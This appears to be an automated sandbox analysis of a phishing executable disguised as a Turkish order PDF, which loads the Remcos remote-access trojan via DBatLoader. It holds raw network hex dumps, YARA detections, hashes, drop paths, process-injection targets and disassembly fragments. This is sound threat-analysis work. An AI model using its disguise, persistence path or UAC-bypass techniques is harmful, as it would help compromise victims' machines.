91 bb 40 1e 6b 88 31 b5 df 1f de 48 0c 06 c5 0b 19 50 2d e1 90 71 d7 5c 9f 2c
                                Data Ascii: m_tji?+z5Q7Kl:ku%}^P^Y4vxW[t_;faKxK3*i? *E,XnH~rnYLR(BH-'dkG,T<1j;D~8Z'NV/?hFY,,5K9wF?KTlo]0@k1HP-q\,
                                2022-06-26 07:43:17 UTC815INData Raw: 6c bc be 43 ba 80 4a 55 1d d0 2c 51 54 a9 84 72 85 1d c6 a9 30 b1 aa 88 f2 7e fe f6 2d 88 d2 f2 7b 12 9e 7a db 6a 01 7f f0 25 89 c3 70 60 bd 4b 9f 2a e1 d5 5c f4 60 39 37 dd f0 da 02 e3 a3 23 89 48 ee a1 04 44 5c 62 c1 38 99 93 05 cc 2a bd c4 db 59 81 95 42 40 0f 04 12 0f cf 83 09 d4 7e 6a 0a 42 d0 18 42 e3 f7 03 fe 94 42 b4 c6 41 d0 b0 47 1c 8c 00 2a d7 7c 71 db 8f ad 3a 64 0a 91 5e 27 6c 12 de 48 56 72 28 ab 8b 0c 62 75 ef 01 51 0a 0c f1 5a d5 86 44 a3 97 f3 60 d3 79 70 8f 0a b5 d6 71 18 a1 a5 52 92 b5 35 0a 37 22 cd 2a 31 29 22 30 de 1a a1 3f b2 b8 e6 51 a2 45 74 bc c1 02 cb e8 96 6b b1 19 0f d6 d8 6d 6d 6b 40 f1 15 7c de e3 31 1b c8 a9 d1 5c ea e8 ad 88 d7 11 f4 69 cd 53 64 93 25 b4 f6 cd 28 ef b7 40 ef be 32 1f d8 53 56 c1 9a ae de bc 4f e0 01 c0 fa
                                Data Ascii: lCJU,QTr0~-{zj%p`K*\`97#HD\b8*YB@~jBBBAG*|q:d^'lHVr(buQZD`ypqR57"*1)"0?QEtkmmk@|1\iSd%(@2SVO
                                2022-06-26 07:43:17 UTC820INData Raw: c6 6d 0c fa 29 c1 70 1b 51 bc 48 f5 81 62 00 28 17 11 89 11 cb 29 6d 0e cd 92 25 bd 66 2a a6 a0 00 5a cd 29 57 7b db 19 25 77 80 17 9a 18 28 14 2c da 24 fd 9b b0 54 a4 09 1e cb 12 f7 bd 41 7c 64 74 3c c9 3d 3b 5c cf ab 90 91 de 54 5d 09 06 34 ea 36 d7 9c 50 c4 4b f0 29 96 e0 ac 4e 6f b4 41 30 10 3d 0d 0d 37 d0 49 8d 85 65 1b 11 8e 8a 98 e0 72 5e 4d d8 dd 4e 50 d1 20 f4 5e 6f 44 09 43 f7 bb 35 48 19 ca 4e cf 69 ef fe e8 0a 22 d4 ca 0c 15 ea c0 b6 73 46 b5 6e 88 18 c8 5f e9 af 85 50 81 dd 7b 11 d9 f0 20 d6 e3 f8 d7 07 62 e7 2d e3 13 fa d4 91 59 2c c6 cd a1 51 d0 49 e9 ca 52 e8 6f 0c a0 82 2b 65 b9 eb f5 0d aa 10 c0 d6 98 ea 73 13 53 a8 33 c7 e5 ae 2a 3c ba 56 62 6c f9 d2 90 a5 e0 4e a5 44 d0 3a f8 15 5a 9d 70 3e c8 5d 12 c6 50 88 3c a1 4a 11 fd d7 8e e4 7b
                                Data Ascii: m)pQHb()m%f*Z)W{%w(,$TA|dt<=;\T]46PK)NoA0=7Ier^MNP ^oDC5HNi"sFn_P{ b-Y,QIRo+esS3*<VblND:Zp>]P<J{
                                2022-06-26 07:43:17 UTC831INData Raw: 10 75 0a 59 57 81 33 0a 5e 71 c5 49 d7 50 03 12 fa d5 95 b4 f3 9f 98 93 39 02 6a af aa 72 87 c6 cb a5 b1 f8 f7 5b 2f 15 e5 7b 4e 1c 7e c0 71 f0 5b 2a b5 ee a5 89 70 99 16 0d cf fb e2 cb ac b1 f1 ad c3 2f fe 2a 1b 8e 4e 03 1e 7b 24 0b 3e e5 11 ce f1 e3 d3 c4 bf 49 c9 74 73 37 69 4a 65 d1 70 87 18 f5 41 98 85 ba d7 1e cc 70 a0 b9 45 79 9d ba 84 76 c3 03 c5 f3 25 53 89 d1 e3 7e cc 28 63 3e 57 27 82 b5 05 19 36 9f ca 6a 22 07 7e 93 ca fe 11 ec 46 46 27 a5 23 4c 66 e9 9d e1 53 2b 6f 93 e3 bd 1d 1b 57 c2 5f 8b 24 bb 45 39 ce f2 44 ce b9 85 ea 9b ab e8 82 8c f5 ed e6 59 dd 92 b3 8d 20 bd b1 0a 4b 6a 63 a3 6d ac 8c e5 d4 70 05 ba db 7b ab 38 57 cc 89 c2 31 76 b7 43 4c 39 bd c5 46 64 9b d6 fc 68 62 4e ee 11 2d 80 6b d7 aa 73 19 83 8d 60 59 68 f9 bb 8d a9 05 63 ec
                                Data Ascii: uYW3^qIP9jr[/{N~q[*p/*N{$>Its7iJepApEyv%S~(c>W'6j"~FF'#LfS+oW_$E9DY Kjcmp{8W1vCL9FdhbN-ks`Yhc
                                2022-06-26 07:43:17 UTC836INData Raw: 31 76 44 1c c2 43 1f 51 2d 76 31 ef 22 c1 34 3d d4 96 16 30 5d 12 54 f1 8e 42 29 4f 8c 0d bc ea 8f fd d5 b8 22 4a 4f 04 c2 84 5d 55 ef 87 06 b8 b5 fa 9c 2e 03 8a 4f 90 04 97 12 aa d0 d6 df 6c d5 e6 0b dc 2b 03 c4 93 1f 74 06 76 07 24 72 7e 50 fc 03 f9 b2 fb b3 a0 40 34 1b 99 8b f1 3b 11 9d 77 f3 86 12 04 77 4f b8 69 ec f4 bd 50 8b 25 c7 40 9f 85 88 fa 12 f3 94 5f d3 07 69 1b 20 38 9f db 15 95 8f 2c 13 42 f5 20 8c bd 54 57 80 7d bd 2d ba e1 3a d7 9b c2 1d bc 5a fb 0b f1 e9 68 38 60 e0 97 36 6a ca 67 45 ec 2b 8f e5 f5 c8 f3 6b b2 30 33 34 ce bd e0 39 e6 5b 30 fa f2 16 46 a2 c9 f9 7d f5 62 31 04 23 72 c3 f5 4c 8b 9b 44 b3 ba d3 5c b1 2d ff 43 a3 6d 77 cd e5 76 af 01 be 72 bf d6 a6 b0 ec ef 74 cd 9f 57 96 5a 7f b3 df 37 ae c3 96 6f 18 fa 6d 3c fd 75 c0 02 f3
                                Data Ascii: 1vDCQ-v1"4=0]TB)O"JO]U.Ol+tv$r~P@4;wwOiP%@_i 8,B TW}-:Zh8`6jgE+k0349[0F}b1#rLD\-CmwvrtWZ7om<u
                                2022-06-26 07:43:17 UTC852INData Raw: 73 bc ae fc a3 a2 31 be ad 92 38 fd 67 a5 e6 72 92 1a 64 35 ea 8c 45 d1 45 a3 e7 1f b9 a9 a6 0a 92 39 d9 0f 91 3c bc e0 00 a6 ca bd e1 72 00 7e 46 5b d9 00 7e b4 70 85 66 a2 c8 72 e9 44 f2 2c 74 51 e2 fe 5c 79 6c 07 ea d4 ab cb d4 3b fe 80 7d 9e 94 37 57 40 a3 40 31 45 45 33 00 f2 2c b1 d1 e8 7b c6 fa 44 53 3d af d2 36 3e 07 76 d6 d2 81 d7 02 74 64 7e 29 0e ca 6f be 57 40 7c c9 21 3c 1d 16 a2 d4 3f 9f dd 70 6f 67 87 6f e3 1c e1 0e de ea 0c 14 1a 97 ed dd 34 66 44 45 92 e6 60 36 63 8b c0 a4 2a e7 2b 7c c2 a0 11 3c 78 67 2e 09 5e 32 2e 96 d6 e5 44 d2 1b 49 51 61 b7 e6 f2 3c 35 47 90 0a c7 5a 98 27 fe b8 57 a5 f6 1f 5c f1 e3 b5 d6 e7 bb 19 61 39 9b ce ff 6b f8 2b af 26 8e c6 db ce f5 6a 50 8b 4e 2c 60 9e e6 a3 d1 70 e2 e2 b2 9a b1 aa 4e c2 c1 55 ab 3a 7d f2
                                Data Ascii: s18grd5EE9<r~F[~pfrD,tQ\yl;}7W@@1EE3,{DS=6>vtd~)oW@|!<?pogo4fDE`6c*+|<xg.^2.DIQa<5GZ'W\a9k+&jPN,`pNU:}
                                2022-06-26 07:43:17 UTC863INData Raw: f0 55 d2 a4 ba 6b 88 7a 67 59 ec f4 69 5a df e8 0c 85 d7 4d 37 55 73 9e 36 93 19 0a 7f d4 b1 a8 22 fb ef cd a0 75 bd cd 1d 94 1d 67 6d 63 91 97 7a 0d 8c 33 45 45 48 94 e3 ad 35 76 a1 9c 8e cc 68 76 11 f6 1d 89 1b 8a 9a c7 2d 5b 3f db 49 21 02 20 9d 75 1e b7 87 55 bd e4 da 4b b3 8a aa 23 ab 36 68 4e fd 5c 74 d8 a1 e6 36 36 51 75 58 9f 0a 77 29 0d c0 b0 11 6a ba 3e 26 69 8d 7f 4c 68 72 ca 61 44 92 22 81 6d f2 01 5e 82 88 13 cb f2 e7 91 c4 d0 6f dd 7a 9c 6f b6 53 40 61 8f 79 85 dd c9 fa 9e 3b 9d 11 32 87 45 60 3c 84 30 1d fd b1 77 21 9d 6c f3 3b 80 75 a0 60 d1 fc c0 3f 94 58 d2 f9 01 4e 5a 04 b5 36 32 72 01 9b 9b b9 60 61 c2 97 bc e7 db 38 f8 f7 35 49 fa e5 91 06 9d 9d a1 95 28 0f c4 61 04 95 00 a9 00 c9 57 d3 13 a5 bd 7f 3c 08 4c b9 c8 58 ea 58 7c 64 29 20
                                Data Ascii: UkzgYiZM7Us6"ugmcz3EEH5vhv-[?I! uUK#6hN\t66QuXw)j>&iLhraD"m^ozoS@ay;2E`<0w!l;u`?XNZ62r`a85I(aW<LXX|d)
                                2022-06-26 07:43:17 UTC879INData Raw: 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 85 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 85 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 3c 85 8d 75 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73
                                Data Ascii: wUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ<uuii$s"}}uii$s"uii$s"}}uii$s"uii$s"}}uii$s"uii$s"}}uii$s"uii$s"}}uii$s


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:09:42:42
                                Start date:26/06/2022
                                Path:C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe"
                                Imagebase:0x400000
                                File size:901632 bytes
                                MD5 hash:8E60C68E832622B0EBD88A612898A9F9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Yara matches:
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.315120211.0000000003610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.306973875.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.316837700.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.315970483.0000000003AEC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.317153227.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.312930120.0000000003050000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.315787933.0000000003968000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000000.259960102.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Target ID:3
                                Start time:09:42:57
                                Start date:26/06/2022
                                Path:C:\Windows\SysWOW64\logagent.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\logagent.exe
                                Imagebase:0xea0000
                                File size:86016 bytes
                                MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                Reputation:moderate

                                General

                                Target ID:8
                                Start time:09:43:06
                                Start date:26/06/2022
                                Path:C:\Users\Public\Libraries\Eluiezilfw.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\Public\Libraries\Eluiezilfw.exe"
                                Imagebase:0x400000
                                File size:901632 bytes
                                MD5 hash:8E60C68E832622B0EBD88A612898A9F9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:Borland Delphi
                                Yara matches:
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.344209783.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000008.00000002.348456214.0000000003C4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.347399894.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.346405704.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.349121751.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000000.309996740.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000008.00000002.347895283.0000000003AC8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.349277729.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Eluiezilfw.exe, Author: Joe Security
                                Antivirus matches:
                                • Detection: 22%, ReversingLabs
                                Reputation:low

                                General

                                Target ID:13
                                Start time:09:43:14
                                Start date:26/06/2022
                                Path:C:\Users\Public\Libraries\Eluiezilfw.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\Public\Libraries\Eluiezilfw.exe"
                                Imagebase:0x400000
                                File size:901632 bytes
                                MD5 hash:8E60C68E832622B0EBD88A612898A9F9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:Borland Delphi
                                Yara matches:
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000D.00000002.360030568.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000D.00000000.326994994.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000D.00000002.361029837.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000D.00000002.360948526.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000D.00000002.358808877.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 0000000D.00000002.360606462.0000000003C4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000D.00000002.360296603.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 0000000D.00000002.360448965.0000000003AC8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Target ID:14
                                Start time:09:43:14
                                Start date:26/06/2022
                                Path:C:\Windows\SysWOW64\logagent.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\logagent.exe
                                Imagebase:0xea0000
                                File size:86016 bytes
                                MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                Reputation:moderate

                                General

                                Target ID:15
                                Start time:09:43:25
                                Start date:26/06/2022
                                Path:C:\Windows\SysWOW64\DpiScaling.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\DpiScaling.exe
                                Imagebase:0x1040000
                                File size:77312 bytes
                                MD5 hash:302B1BBDBF4D96BEE99C6B45680CEB5E
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                Reputation:moderate

                                Disassembly

                                Reset < >

                                  Non-executed Functions

                                  Function 036E19E8 Relevance: 7.3, Strings: 2, Instructions: 4774COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000003.279439053.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                  • Associated: 00000000.00000003.269771326.00000000036E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_3_36e0000_Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !$%
                                  • API String ID: 0-2082652196
                                  • Opcode ID: 21e73f660005ec1a14e86006ef494f4aba2c2e3be36f415ba3b1b11f4bc42649
                                  • Instruction ID: 7af1a916b25e7d95dd29cccff067783bc6f7933c3dc3e9cb7bac5fc167adba8a
                                  • Opcode Fuzzy Hash: 21e73f660005ec1a14e86006ef494f4aba2c2e3be36f415ba3b1b11f4bc42649
                                  • Instruction Fuzzy Hash: B3A3816544E3D18FC7538BB48DA16803FB1AE1B26475E05DBC080CF5B3E2AD695ADB23
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 036E1A14 Relevance: 7.2, Strings: 2, Instructions: 4704COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000003.279439053.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                  • Associated: 00000000.00000003.269771326.00000000036E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_3_36e0000_Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !$%
                                  • API String ID: 0-2082652196
                                  • Opcode ID: 167d50453b38688b3c72e9f1fc1a373a5e03a55b5a81dd43731d00c8152db099
                                  • Instruction ID: 8074240ec7649543ec473ac3744343f97f0bb6e37cf65cc1a2675c992c0cf464
                                  • Opcode Fuzzy Hash: 167d50453b38688b3c72e9f1fc1a373a5e03a55b5a81dd43731d00c8152db099
                                  • Instruction Fuzzy Hash: CEA3816544E3D18FC7538BB48DA16803FB1AE1B26475E05DBC080CF5B3E2AD695ADB23
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 036E9B05 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000003.269771326.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                  • Associated: 00000000.00000003.279439053.00000000036E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_3_36e0000_Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: 4f2c4fb839994718c9557afcb9db90ac30e81c9e04832298544c187920f8cae8
                                  • Instruction ID: 81519c8bec72dc1aa20fe9d50f5498c3fe7bf468ea2674f41dc26077510c9b24
                                  • Opcode Fuzzy Hash: 4f2c4fb839994718c9557afcb9db90ac30e81c9e04832298544c187920f8cae8
                                  • Instruction Fuzzy Hash: F6516773D29B51CFDB12CF34C94A2CA7BB0FE213117588AAED89186105D734D119CB8B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 038D3D3F Relevance: .1, Instructions: 121COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000003.278534199.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_3_38d0000_Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 39be055803cf8deaa203db0f9e540671e7351c1fa794598f24cc39a6f5ebdd18
                                  • Instruction ID: 3af60aad8493b4b496345f829ea901592c5e633cd19ecac93745adae3d3676b0
                                  • Opcode Fuzzy Hash: 39be055803cf8deaa203db0f9e540671e7351c1fa794598f24cc39a6f5ebdd18
                                  • Instruction Fuzzy Hash: 6A31CF62818641CED317AF75CE96696FF79FB267643284B98C0C2CF4ABD325C042CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:6%
                                  Dynamic/Decrypted Code Coverage:97.2%
                                  Signature Coverage:21.8%
                                  Total number of Nodes:1750
                                  Total number of Limit Nodes:50
                                  execution_graph 17256 40d84a 17257 40180c 4 API calls 17256->17257 17258 40d854 17257->17258 17261 412881 7 API calls 17258->17261 17260 40d861 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ _wsystem 17261->17260 17624 411c4c 6 API calls 17625 4129eb 21 API calls 17624->17625 17626 411cb8 17625->17626 17627 411cc0 17626->17627 17628 411d32 17626->17628 17629 411cc5 17627->17629 17630 411d2b 17627->17630 17631 40180c 4 API calls 17628->17631 17634 411cca 17629->17634 17635 411cfc 17629->17635 17633 411a24 106 API calls 17630->17633 17632 411d3c 17631->17632 17636 40180c 4 API calls 17632->17636 17640 411ccf 17633->17640 17639 411cf7 SetEvent 17634->17639 17634->17640 17637 40180c 4 API calls 17635->17637 17638 411d47 17636->17638 17641 411d08 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 17637->17641 17642 40180c 4 API calls 17638->17642 17639->17640 17644 4017dd 3 API calls 17640->17644 17643 40180c 4 API calls 17641->17643 17645 411d52 17642->17645 17646 411d21 17643->17646 17647 411d70 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 17644->17647 17652 